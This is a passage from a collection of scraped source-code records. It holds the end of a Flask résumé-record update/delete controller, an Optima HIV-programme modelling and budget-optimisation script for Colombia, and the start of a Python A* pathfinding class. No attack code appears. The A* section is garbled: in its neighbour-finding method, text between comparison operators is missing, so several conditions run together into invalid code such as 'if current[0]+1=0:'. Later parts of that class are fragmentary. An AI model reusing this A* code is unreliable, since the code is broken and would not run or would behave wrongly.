curriculo_atualizar = Curriculo.query.filter_by(id_curriculo=request.form.get('id_curriculo')).first()\n\n curriculo_atualizar.titulo = request.form.get('titulo')\n curriculo_atualizar.cargo = request.form.get('cargo')\n curriculo_atualizar.objetivo = request.form.get('objetivo')\n\n curriculo_atualizar.data_alteracao = datetime.datetime.now()\n db.session.commit()\n return {'message': 'curriculo atualizado com sucesso'}\n except Exception as exc:\n return {'error': str(exc)}\n\n\n@bp.route('/delete', methods=['DELETE'])\ndef delete_curriculo():\n try:\n curriculo_deletar = Curriculo.query.filter_by(id_curriculo=request.form.get('id_curriculo')).first()\n\n db.session.delete(curriculo_deletar)\n db.session.commit()\n return {'message': 'curriculo deletado com sucesso'}\n except Exception as exc:\n return {'error': str(exc)}","sub_path":"src/api/controllers/curriculos_controllers.py","file_name":"curriculos_controllers.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"279622968","text":"\"\"\"\nCreate & analyse Colombia project\n\"\"\"\n\n## Define what to run\n\ntorun = [\n#'loadproject', # Load existing project - use as an alternative to running all components\n'makeproject', # PLACEHOLDER: get details from Azfar\n'makeprograms', # Create programs\n'addeffects', # Modify effects\n'scriptcalibration', # PLACEHOLDER: get details from Azfar\n#'manualcalibration', # PLACEHOLDER: get details from Azfar\n#'plotresults', # Plot results\n#'compareoutcomes', # Compare the parameters under calibration and cost functions\n#'budgetscens', # Run basic budget scenarios\n'90-90-90', # Run 90-90-90 scenario\n#'basicoptimize', # Run basic optimization\n#'exportdata' # Export data\n#'saveproject', # Save project\n]\n\n\n##############################################################################\n## Initialization\n##############################################################################\n\nfrom optima import Project, Program, Programset, Budgetscen, Parscen, dcp, pygui, findinds\n\nif 'doplot' not in locals(): doplot = True\n\n#userdir = '/Users/robynstuart/Google Drive/Optima/'\nuserdir = '/u/cliffk/drive/optima/'\ncountrydir = userdir + 'Optima applications/Colombia/2.0/'\nprojectdir = countrydir + 'Project files/'\nspreadsheetfile = countrydir + 'Data/Colombia 20160307.xlsx'\nprojectfile = projectdir + 'Colombia_20160324_CK.prj'\nnewprojectfile = projectdir + 'Colombia_20160327_CK.prj'\n\n\n##############################################################################\n## Analysis steps\n##############################################################################\n\n# Load existing project\nif 'loadproject' in torun:\n \n print(' Load project...')\n from optima import loadobj, Settings\n P = loadobj(projectfile)\n P.name = 'colombia-orig'\n P.settings = Settings() # Reset settings\n\n\n\n# Adjust viral suppressions\nif 'lowertreatvs' in torun:\n \n print(' Use slightly lower viral suppression pre-2015...')\n ps = P.parsets[0].pars[0]\n ps['treatvs'].t[:] = array([[ 2000., 2015.]])\n ps['treatvs'].y[:] = array([[0.5, 0.7]])\n\n\n# There's an optimisatin in the saved project, remove it if you want\nif 'deleteoptim' in torun:\n P.rmresult()\n\n\n# Create project\nif 'makeproject' in torun:\n print(' Making project...')\n P = Project(name='colombia-ck', spreadsheet=spreadsheetfile, dorun=False)\n \n\n\n# Add programs\nif 'makeprograms' in torun:\n\n pops = P.data['pops']['short']\n genpoplist = []\n genpoplist.append(pops[4])\n genpoplist.append(pops[5])\n homelesspoplist = []\n homelesspoplist.append(pops[6])\n homelesspoplist.append(pops[7])\n malelist = [pops[i] for i in range(len(pops)) if P.data['pops']['male'][i]]\n idulist = [pops[i] for i in range(len(pops)) if P.data['pops']['injects'][i]]\n pwidlist = idulist[0] \n fswlist = [pops[i] for i in range(len(pops)) if P.data['pops']['sexworker'][i] and P.data['pops']['female'][i]]\n\n regpships = P.parsets['default'].pars[0]['condreg'].y.keys()\n caspships = P.parsets['default'].pars[0]['condcas'].y.keys()\n compships = P.parsets['default'].pars[0]['condcom'].y.keys()\n\n\n # Extract casual partnerships that include at least one female sex worker\n fsw_caspships = []\n for fsw in fswlist:\n for caspship in caspships:\n if fsw in caspship:\n fsw_caspships.append(caspship)\n\n # Extract commercial partnerships that include at least one female sex worker\n fsw_compships = []\n for fsw in fswlist:\n for compship in compships:\n if fsw in compship:\n fsw_compships.append(compship)\n\n # Extract men 
who have sex with men\n msmlist = []\n for pship in regpships+caspships+compships:\n if pship[0] in malelist and pship[1] in malelist:\n msmlist.append(pship[0])\n msmlist = list(set(msmlist))\n\n # Extract casual partnerships that include at least one man who has sex with men\n msm_caspships = []\n for msm in msmlist:\n for caspship in caspships:\n if msm in caspship:\n msm_caspships.append(caspship)\n msm_caspships = list(set(msm_caspships))\n\n # Extract casual partnerships that include at least one person who injects drugs \n pwid_caspships = []\n for pwid in [pwidlist]:\n for caspship in caspships:\n if pwid in caspship:\n pwid_caspships.append(caspship)\n pwid_caspships = list(set(pwid_caspships))\n \n # Extract casual partnerships that include at least one homeless person \n homeless_caspships = []\n for homeless in homelesspoplist:\n for caspship in caspships:\n if homeless in caspship:\n homeless_caspships.append(caspship)\n homeless_caspships = list(set(homeless_caspships))\n\n # Extract casual partnerships that include at least one general population member \n gp_caspships = []\n for gp in genpoplist:\n for caspship in caspships:\n if gp in caspship:\n gp_caspships.append(caspship)\n gp_caspships = list(set(gp_caspships))\n\n\n # Set up default programs\n Condoms_EPS = Program(short='Condoms (EPS)',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in caspships]+[{'param': 'condcom', 'pop': compship} for compship in compships],\n targetpops=pops,\n name='Condom promotion and distribution by EPS')\n \n SBCC = Program(short='SBCC',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in gp_caspships],\n targetpops=genpoplist,\n name='Social and behavior change communication')\n \n \n FSW_programs = Program(short='FSW programs',\n targetpars=[{'param': 'condcom', 'pop': compship} for compship in fsw_compships] + [{'param': 'condcas', 'pop': caspship} for caspship in fsw_caspships] + [{'param': 'hivtest', 'pop': pop} for pop in fswlist],\n targetpops=fswlist,\n name='Programs for female sex workers and clients')\n \n MSM_programs = Program(short='MSM programs',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in [('Females 15-49', 'MSM'), ('Transgender', 'MSM'), ('MSM', 'MSM')]] + [{'param': 'hivtest', 'pop': 'MSM'}],\n targetpops=['MSM'],\n name='Programs for men who have sex with men')\n \n Transgender_programs = Program(short='Transgender programs',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in [('Transgender', 'MSM'), ('Transgender', 'Transgender')]] + [{'param': 'hivtest', 'pop': 'Transgender'}],\n targetpops=['Transgender'],\n name='Programs for transgender individuals')\n \n Homeless_programs = Program(short='Homeless programs',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in homeless_caspships] + [{'param': 'hivtest', 'pop': pop} for pop in homelesspoplist],\n targetpops=homelesspoplist,\n name='Programs for homeless people')\n \n PWID_programs = Program(short='PWID programs',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in pwid_caspships] + [{'param': 'hivtest', 'pop': 'PWID'}]+[{'param': 'condcom', 'pop': ('PWID', 'FSW')}],\n targetpops=['PWID'],\n name='Programs for people who inject drugs')\n \n NSP = Program(short='NSP',\n targetpars=[{'param': 'sharing', 'pop': pop} for pop in idulist],\n targetpops=idulist,\n name='Needle-syringe programs')\n \n HTC_EPS = Program(short='HTC (EPS)',\n targetpars=[{'param': 'hivtest', 'pop': pop} for pop in pops],\n targetpops=pops,\n 
name='HIV testing and counseling')\n \n ART = Program(short='ART',\n targetpars=[{'param': 'numtx', 'pop': 'tot'}],# for pop in pops],\n targetpops=pops,\n name='Antiretroviral therapy')\n \n PMTCT_treatment = Program(short='PMTCT (treatment)',\n targetpars=[{'param': 'numpmtct', 'pop': 'tot'},{'param': 'numtx', 'pop': 'tot'}],\n targetpops=pops,\n name='Prevention of mother-to-child transmission, treatment',\n criteria = {'hivstatus': 'allstates', 'pregnant': True})\n \n PMTCT_testing = Program(short='PMTCT (testing)',\n targetpars=[{'param': 'hivtest', 'pop': pop} for pop in ['FSW','Females 15-49','Homeless Females']],\n targetpops=['FSW','Females 15-49','Homeless Females'],\n name='Prevention of mother-to-child transmission, testing',\n criteria = {'hivstatus': 'allstates', 'pregnant': True})\n \n MGMT = Program(short='MGMT',\n category='Management and administration',\n name='Management')\n \n HR = Program(short='HR',\n category='Management and administration',\n name='HR and training')\n \n ENV = Program(short='ENV',\n category='Management and administration',\n name='Enabling environment')\n \n ME = Program(short='ME',\n category='Other',\n name='Monitoring, evaluation, surveillance, and research')\n\n\n #Add cost functions\n Condoms_EPS.costcovfn.addccopar({'saturation':(0.6,0.8),'t': 2016.0, 'unitcost':(.5,.6)}) #Condoms (EPS)\n \n SBCC.costcovfn.addccopar({'saturation': (0.75,0.85),\n 't': 2016.0,\n 'unitcost': (0.04,0.06)}) #SBCC\n \n FSW_programs.costcovfn.addccopar({'saturation': (1.0,1.0),\n 't': 2016.0,\n 'unitcost': (90,100)}) #FSW programs\n \n MSM_programs.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (33,50)}) #MSM programs\n \n PWID_programs.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (40,65)}) #PWID programs\n \n NSP.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (1,3)}) #NSP\n\n HTC_EPS.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (11,12)}) #HTC (EPS)\n \n ART.costcovfn.addccopar({'saturation': (1.0,1.0),\n 't': 2016.0,\n 'unitcost': (515,664)}) #ART\n \n PMTCT_treatment.costcovfn.addccopar({'saturation': (1.0,1.0),\n 't': 2016.0,\n 'unitcost': (450,500)}) #PMTCT (treatment)\n\n Homeless_programs.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (40,65)}) #Homeless programs\n \n Transgender_programs.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (25,40)}) #Transgender programs\n \n PMTCT_testing.costcovfn.addccopar({'saturation': (1.0,1.0),\n 't': 2016.0,\n 'unitcost': (11,12)}) #PMTCT (testing)\n \n #add cost-coverage data\n #variable costs\n Condoms_EPS.addcostcovdatum({'t':2012,'cost':158128.0,'coverage':28735.0})\n SBCC.addcostcovdatum({'t':2013,'cost':794546.0,'coverage':16402290.0}) \n FSW_programs.addcostcovdatum({'t':2013,'cost':3837510.96,'coverage':24124.78})\n MSM_programs.addcostcovdatum({'t':2013,'cost':7160644.32,'coverage':160914.39})\n PWID_programs.addcostcovdatum({'t':2013,'cost':0.0,'coverage':0.0})\n NSP.addcostcovdatum({'t':2013,'cost':1873.0,'coverage':1650.0}) \n HTC_EPS.addcostcovdatum({'t':2012,'cost':6074473.0,'coverage':463897.0})\n ART.addcostcovdatum({'t':2014,'cost':34680116.0,'coverage':59622.0})\n PMTCT_treatment.addcostcovdatum({'t':2013,'cost':329137.0,'coverage':691.0}) \n Homeless_programs.addcostcovdatum({'t':2013,'cost':1024840.41,'coverage':19582.80})\n Transgender_programs.addcostcovdatum({'t':2013,'cost':1037310.01,'coverage':22134.61})\n 
PMTCT_testing.addcostcovdatum({'t':2012,'cost':3771200.0,'coverage':288000.0})\n \n #fixed costs - MGMT, HR, ENV, ME\n MGMT.addcostcovdatum({'t':2013,'cost':298415.23,'coverage':None})\n HR.addcostcovdatum({'t':2013,'cost':446117.96,'coverage':None})\n ENV.addcostcovdatum({'t':2013,'cost':132030.15,'coverage':None})\n ME.addcostcovdatum({'t':2013,'cost':13604.74,'coverage':None})\n\n\n allprograms = [Condoms_EPS, SBCC, FSW_programs, MSM_programs, Transgender_programs, Homeless_programs, PWID_programs, NSP, HTC_EPS, ART, PMTCT_treatment, PMTCT_testing, MGMT, HR, ENV, ME]\n R = Programset(programs=allprograms)\n P.addprogset(name='default', progset = R)\n\n\n\n# Add effects\nif 'addeffects' in torun: \n\n R = P.progsets[0]\n\n #needle sharing parameters \n R.covout['sharing']['Homeless Females'].addccopar({'NSP': (0.01, 0.02),'intercept': (0.15, 0.15), 't': 2015.0})\n R.covout['sharing']['PWID'].addccopar({'NSP': (0.01, 0.02), 'intercept': (0.32, 0.32), 't': 2015.0})\n R.covout['sharing']['Homeless Males'].addccopar({'NSP': (0.01, 0.02), 'intercept': (0.15, 0.15), 't': 2015.0})\n \n #commercial condom use parameters\n R.covout['condcom'][('Males 15-49', 'FSW')].addccopar({'intercept': (0.6, 0.6), 'FSW programs': (0.99, 0.99), 'Condoms (EPS)':(.99,.99), 't': 2015.0})\n R.covout['condcom'][('PWID', 'FSW')].addccopar({'intercept': (0.6, 0.6), 't': 2015.0, 'FSW programs': (0.99, 0.99), 'Condoms (EPS)':(.99,.99), 'PWID programs':(.99,.99)})\n \n #number of people on ART\n R.covout['numtx']['tot'].addccopar({'intercept': (0.0, 0.0), 'ART': [], 'PMTCT (treatment)': [], 't': 2015.0})\n \n #number of women on PMTCT\n R.covout['numpmtct']['tot'].addccopar({'intercept': (0.0, 0.0), 't': 2015.0, 'PMTCT (treatment)': []})\n \n #casual condom use parameters\n R.covout['condcas'][('MSM', 'MSM')].addccopar({'MSM programs': (0.99, 0.99), 'Condoms (EPS)': (0.99, 0.99), 'intercept': (0.3, 0.35), 't': 2015.0})\n R.covout['condcas'][('Transgender', 'MSM')].addccopar({'MSM programs': (0.65, 0.75), 'Condoms (EPS)': (0.8, 0.8), 'intercept': (0.1, 0.1), 'Transgender programs': (0.7, 0.7), 't': 2015.0})\n R.covout['condcas'][('Transgender', 'Transgender')].addccopar({'Transgender programs': (0.9, 0.9), 'Condoms (EPS)': (0.8, 0.8), 'intercept': (0.1, 0.1), 't': 2015.0})\n R.covout['condcas'][('PWID', 'FSW')].addccopar({'Condoms (EPS)': (0.7, 0.7), 'PWID programs': (0.5, 0.6), 'intercept': (0.01, 0.02), 't': 2015.0, 'FSW programs': (0.5, 0.6)})\n R.covout['condcas'][('Males 15-49', 'FSW')].addccopar({'Condoms (EPS)': (0.45, 0.5), 'SBCC': (0.2, 0.3), 'intercept': (0.1, 0.2), 't': 2015.0, 'FSW programs': (0.5, 0.6)})\n R.covout['condcas'][('Females 15-49', 'MSM')].addccopar({'MSM programs': (0.9, 0.99), 'Condoms (EPS)': (0.75, 0.8), 'intercept': (0.1, 0.2), 't': 2015.0, 'SBCC': (0.2, 0.3)})\n R.covout['condcas'][('Females 15-49', 'PWID')].addccopar({'Condoms (EPS)': (0.99, 0.99), 'PWID programs': (0.99, 0.99), 'intercept': (0.2, 0.4), 't': 2015.0, 'SBCC': (0.4, 0.5)})\n R.covout['condcas'][('Females 15-49', 'Males 15-49')].addccopar({'Condoms (EPS)': (0.7, 0.9), 'intercept': (0.1, 0.2), 't': 2015.0, 'SBCC': (0.5, 0.55)})\n R.covout['condcas'][('Homeless Females', 'Homeless Males')].addccopar({'Condoms (EPS)': (0.99, 0.99), 'intercept': (0.57, 0.6), 'Homeless programs': (0.99, 0.99), 't': 2015.0})\n \n #HIV testing parameters\n R.covout['hivtest']['FSW'].addccopar({'HTC (EPS)': (0.5,0.5), 'intercept': (0.001, 0.1), 'PMTCT (testing)': (0.8,0.8),'t': 2015.0, 'FSW programs': (0.45,0.47)})\n 
R.covout['hivtest']['MSM'].addccopar({'MSM programs': (0.5,0.5), 'HTC (EPS)': (0.5,0.5), 'intercept': (0.01, 0.05), 't': 2015.0})\n R.covout['hivtest']['Transgender'].addccopar({'Transgender programs': (0.4,0.43), 'HTC (EPS)': (0.4,0.4), 'intercept': (0.01, 0.05), 't': 2015.0})\n R.covout['hivtest']['Homeless Males'].addccopar({'HTC (EPS)': (0.99,0.99), 'intercept': (0.01, 0.1), 'Homeless programs': (0.99,0.99),'t': 2015.0})\n R.covout['hivtest']['Homeless Females'].addccopar({'HTC (EPS)': (0.99,0.99), 'intercept': (0.01, 0.1), 'Homeless programs': (0.99,0.99), 'PMTCT (testing)': (0.99,0.99),'t': 2015.0})\n R.covout['hivtest']['PWID'].addccopar({'HTC (EPS)': (0.9,0.9), 'PWID programs': (0.9,0.9), 'intercept': (0.01, 0.1), 't': 2015.0})\n R.covout['hivtest']['Males 15-49'].addccopar({'HTC (EPS)': (0.3,0.5), 'intercept': (0.001, 0.05), 't': 2015.0})\n R.covout['hivtest']['Females 15-49'].addccopar({'HTC (EPS)': (0.3,0.5), 'intercept': (0.001, 0.05), 'PMTCT (testing)': (0.9,0.99),'t': 2015.0})\n\n P.addprogset(name='default', progset = R)\n\n\n\n\n\n# Do calibration \nif 'scriptcalibration' in torun:\n print(' Calibrating project...')\n from numpy import array\n pars = P.parsets[0].pars[0]\n \n # Reduce testing rates, change force of infection, etc.\n pars['hivtest'].m = 0.5\n pars['aidstest'].m = 0.1\n # ['FSW', 'MSM', 'Transgender', 'PWID', 'Males 15-49', 'Females 15-49', 'Homeless Males', 'Homeless Females']\n pars['initprev'].y[:] = array([ 0.0075, 0.15 , 0.17 , 0.03 , 0.0012, 0.001 , 0.1 , 0.1 ])\n pars['force'].y[:] = array([ 16. , 0.21 , 0.165, 0.21 , 1.1 , 0.375, 4.4 , 1. ])\n\n\n\n# Plot results\nif 'plotresults' in torun:\n P.runsim()\n pygui(P.results[-1])\n\n\n# Manual calibration\nif 'manualcalibration' in torun:\n P.manualfit()\n\n\n\n\n\n## Compare outcomes under budget and calibration\nif 'compareoutcomes' in torun:\n comparison = P.progsets[0].compareoutcomes(parset=P.parsets[0], year=2016, doprint=True)\n\n\n\nif 'budgetscens' in torun:\n## Run sanity check budget scenarios\n \n ## Define scenarios\n defaultbudget = P.progsets['default'].getdefaultbudget()\n KPbudget = dcp(defaultbudget)\n KPbudget['FSW programs'] = 0.0\n KPbudget['MSM programs'] = 0.0\n KPbudget['Transgender programs'] = 0.0\n KPbudget['Homeless programs'] = 0.0\n\n scenlist = [\n Parscen(name='Current conditions', parsetname='default', pars=[]),\n Budgetscen(name='Current budget', parsetname='default', progsetname='default', t=[2016], budget=defaultbudget),\n Budgetscen(name='Zero KP budget', parsetname='default', progsetname='default', t=[2016], budget=KPbudget),\n ]\n \n #zerobudget = dcp(defaultbudget)\n #for key in zerobudget: zerobudget[key] = array([0.]) \n #doublebudget = dcp(defaultbudget) \n #for key in doublebudget: doublebudget[key] = array([doublebudget[key]*2])\n #infbudget = dcp(defaultbudget) \n #for key in infbudget: infbudget[key] = array([infbudget[key]+1e14])\n\n #scenlist = [\n # Parscen(name='Current conditions', parsetname='default', pars=[]),\n # Budgetscen(name='Current budget', parsetname='default', progsetname='default', t=[2016], budget=defaultbudget),\n # Budgetscen(name='Zero budget', parsetname='default', progsetname='default', t=[2016], budget=zerobudget),\n # Budgetscen(name='Double budget', parsetname='default', progsetname='default', t=[2016], budget=doublebudget),\n # Budgetscen(name='Infinite budget', parsetname='default', progsetname='default', t=[2016], budget=infbudget),\n # ]\n \n # Run the scenarios\n P.addscenlist(scenlist)\n P.runscenarios() \n \n pygui(P.results[-1], 
toplot=['prev-tot', 'prev-per', 'numinci-tot', 'numdeath-tot'])\n pygui(P.results[-1], toplot=['prev-tot'])\n\n\n\n\nif '90-90-90' in torun:\n## Run the 90-90-90 scenario\n \n ## Define scenarios\n P.copyparset('default','90-90-90')\n from numpy import nan, append\n\n curryear = 2016\n years = [0., curryear, 2020]\n pars = P.parsets['90-90-90'].pars[0]\n P.runsim('default') # Temporary, to get baseline\n res = P.parsets['default'].getresults()\n curryearind = findinds(res.tvec, curryear)\n currplhiv = res.main['numplhiv'].tot[0][curryearind]\n currdx = res.main['numdiag'].tot[0][curryearind]\n currtx = res.main['numtreat'].tot[0][curryearind]\n currdx = currdx/currplhiv\n currtx = currtx/currplhiv\n pars['propdx'].t['tot'] = years\n pars['proptx'].t['tot'] = years\n pars['propdx'].y['tot'] = [nan, currdx, 0.9]\n pars['proptx'].y['tot'] = [nan, currtx, 0.81]\n currvs = pars['treatvs'].interp(pars['treatvs'].t['tot'])\n pars['treatvs'].t['tot'] = append(pars['treatvs'].t['tot'], curryear)\n pars['treatvs'].y['tot'] = append(pars['treatvs'].y['tot'], 0.9)\n P.runsim('90-90-90') # Just make sure it works\n \n scenlist = [\n Parscen(name='Current conditions', parsetname='default', pars=[]),\n Parscen(name='90-90-90', parsetname='90-90-90', pars=[])]\n \n # Run the scenarios\n P.addscenlist(scenlist)\n P.runscenarios() \n \n pygui(P.results[-1], toplot=['prev-tot', 'prev-per', 'numinci-tot', 'numdeath-tot'])\n pygui(P.results[-1], toplot=['prev-tot'])\n\n\nif 'basicoptimize' in torun:\n\n print('Basic optimization for Colombia...')\n from optima import defaultobjectives, defaultconstraints\n \n objectives = defaultobjectives(P.progsets[0]) \n constraints = defaultconstraints(P)\n \n userobynconstraints = 0\n useazfarconstraints = 1\n \n if userobynconstraints:\n constraints['min']['PMTCT (treatment)']=1.0\n constraints['max']['PMTCT (treatment)']=1.0\n constraints['min']['PMTCT (testing)']=1.0\n constraints['max']['PMTCT (testing)']=1.0\n constraints['max']['ART']=1.4\n\n elif useazfarconstraints:\n constraints['min']['Condoms (EPS)'] = 0.0\n constraints['min']['SBCC'] = 0.0\n constraints['min']['FSW programs'] = 0.0\n constraints['min']['MSM programs'] = 0.0\n constraints['min']['Transgender programs'] = 0.0\n constraints['min']['Homeless programs'] = 0.0\n constraints['min']['PWID programs'] = 0.0\n constraints['min']['NSP'] = 0.0\n constraints['min']['HTC (EPS)'] = 0.0\n constraints['min']['ART'] = 1.2\n constraints['min']['PMTCT (treatment)'] = 1.0\n constraints['min']['PMTCT (testing)'] = 1.0\n constraints['min']['MGMT'] = 1.0\n constraints['min']['HR'] = 1.0\n constraints['min']['ENV'] = 1.0\n constraints['min']['ME'] = 1.0\n \n constraints['max']['Condoms (EPS)'] = None\n constraints['max']['SBCC'] = None\n constraints['max']['FSW programs'] = None\n constraints['max']['MSM programs'] = None\n constraints['max']['Transgender programs'] = None\n constraints['max']['Homeless programs'] = None\n constraints['max']['PWID programs'] = None\n constraints['max']['NSP'] = None\n constraints['max']['HTC (EPS)'] = None\n constraints['max']['ART'] = 1.2\n constraints['max']['PMTCT (treatment)'] = 1.0\n constraints['max']['PMTCT (testing)'] = 1.0\n constraints['max']['MGMT'] = 1.0\n constraints['max']['HR'] = 1.0\n constraints['max']['ENV'] = 1.0\n constraints['max']['ME'] = 1.0\n\n\n P.optimize(name='minoutcome', parsetname='default', progsetname='default', objectives=objectives, constraints=constraints, method='asd', maxtime=1000)\n \n print('Original allocation: '),\n 
print(P.results[-1].budget[0])\n print('Optimal allocation: '),\n print(P.optims[-1].getresults().budget[1]) # Showing that results are \"stored\" in the optimization -- same object as before\n\n if doplot: \n from optima import pygui\n pygui(P.results[-1], toplot=['budget', 'improvement', 'prev-tot', 'prev-per', 'numinci-tot'])\n \nif 'exportdata' in torun:\n from optima import *\n from pandas import DataFrame, Series, ExcelWriter\n\n R = P.results[2] #select result to export, can edit to use result name instead\n \n ###############################################################################################################\n #Copy Incidence Estimates to file:\n df = DataFrame({'Current allocation': R.main['numinci'].tot['Current allocation'],\n 'Optimal allocation': R.main['numinci'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('Incidence-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Incidence-Overall')\n writer.save()\n del df\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numinci'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numinci'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('Incidence '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Incidence-'+R.popkeys[x])\n writer.save()\n del df\n \n ############################################################################################################## \n #Copy New Diagnosis Estimates to file:\n df = DataFrame({'Current allocation': R.main['numnewdiag'].tot['Current allocation'], \n 'Optimal allocation': R.main['numnewdiag'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('New diagnosis-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='New diagnosis-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numnewdiag'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numnewdiag'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('New Diagnosis '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='New Diagnosis-'+R.popkeys[x])\n writer.save()\n del df\n ####################################################################################################################\n #Copy Deaths Estimates to file:\n df = DataFrame({'Current allocation': R.main['numdeath'].tot['Current allocation'], \n 'Optimal allocation': R.main['numdeath'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('Deaths-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Deaths-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numdeath'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numdeath'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('Deaths '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Deaths-'+R.popkeys[x])\n writer.save()\n del df\n ####################################################################################################################\n #Copy Number PLHIV to file:\n df = DataFrame({'Current allocation': R.main['numplhiv'].tot['Current allocation'], \n 'Optimal allocation': R.main['numplhiv'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('PLHIV-Overall.xlsx', 
engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='PLHIV-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numplhiv'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numplhiv'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('PLHIV '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='PLHIV-'+R.popkeys[x])\n writer.save()\n del df\n ####################################################################################################################\n #Copy Number Diagnosed PLHIV to file:\n df = DataFrame({'Current allocation': R.main['numdiag'].tot['Current allocation'], \n 'Optimal allocation': R.main['numdiag'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('DiagPLHIV-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='DiagPLHIV-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numdiag'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numdiag'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('DiagPLHIV '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='DiagPLHIV-'+R.popkeys[x])\n writer.save()\n del df\n ####################################################################################################################\n #Copy PLHIV on Treatment to file:\n df = DataFrame({'Current allocation': R.main['numtreat'].tot['Current allocation'], \n 'Optimal allocation': R.main['numtreat'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('Treatment-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Treatment-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numtreat'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numtreat'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('Treatment '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Treatment-'+R.popkeys[x])\n writer.save()\n del df\n\nif 'saveproject' in torun:\n\n print(' Saving Colombia project')\n from optima import saveobj\n saveobj(newprojectfile, P)\n \n \n\n","sub_path":"colombia/fullcolombia2.py","file_name":"fullcolombia2.py","file_ext":"py","file_size_in_byte":31574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
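+The 90-90-90 block in the Colombia script above encodes the UNAIDS cascade targets as fractions of all PLHIV, which is why proptx is set to 0.81 rather than 0.9; a quick worked check (standalone Python, not part of the record):
+```python
+propdx = 0.90            # target: 90% of PLHIV diagnosed
+proptx = 0.90 * propdx   # 90% of the diagnosed on treatment = 0.81 of all PLHIV
+treatvs = 0.90           # 90% of the treated virally suppressed
+print(propdx, proptx, treatvs)  # 0.9 0.81 0.9 -- matching the propdx/proptx/treatvs targets set above
+```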
+{"seq_id":"210566439","text":"import numpy as np\r\nimport heapq\r\nimport copy\r\nimport os\r\nimport imageio\r\nimport shutil\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\n\r\n# PriorityQueue\r\nclass PriorityQueue:\r\n def __init__(self):\r\n self.elements =[]\r\n\r\n def empty(self):\r\n return not self.elements\r\n\r\n def put(self, coordination, priority):\r\n heapq.heappush(self.elements, (priority, coordination))\r\n\r\n def get(self,):\r\n return heapq.heappop(self.elements)[1]\r\n\r\nclass astar_algo:\r\n def __init__(self,mapsize,start_point,end_point,cost_map):\r\n self.map_size=mapsize\r\n self.start_point = start_point\r\n self.end_point = end_point\r\n self.cost_map = cost_map\r\n\r\n # Get neighbors of current position\r\n def get_neighbors(self,current):\r\n neighbors = set()\r\n # Down\r\n if current[0]+1=0:\r\n neighbors.add((current[0],current[1]-1))\r\n # Up\r\n if current[0]-1>=0:\r\n neighbors.add((current[0]-1,current[1]))\r\n # Right\r\n if current[1]+1 (Backwards from the goal to the start)\r\n current = self.end_point\r\n path = []\r\n while current != self.start_point:\r\n path.append(current)\r\n current = came_from[current]\r\n path.append(self.start_point)\r\n path.reverse()\r\n\r\n return path\r\n\r\n def visualization(self,path):\r\n # Save 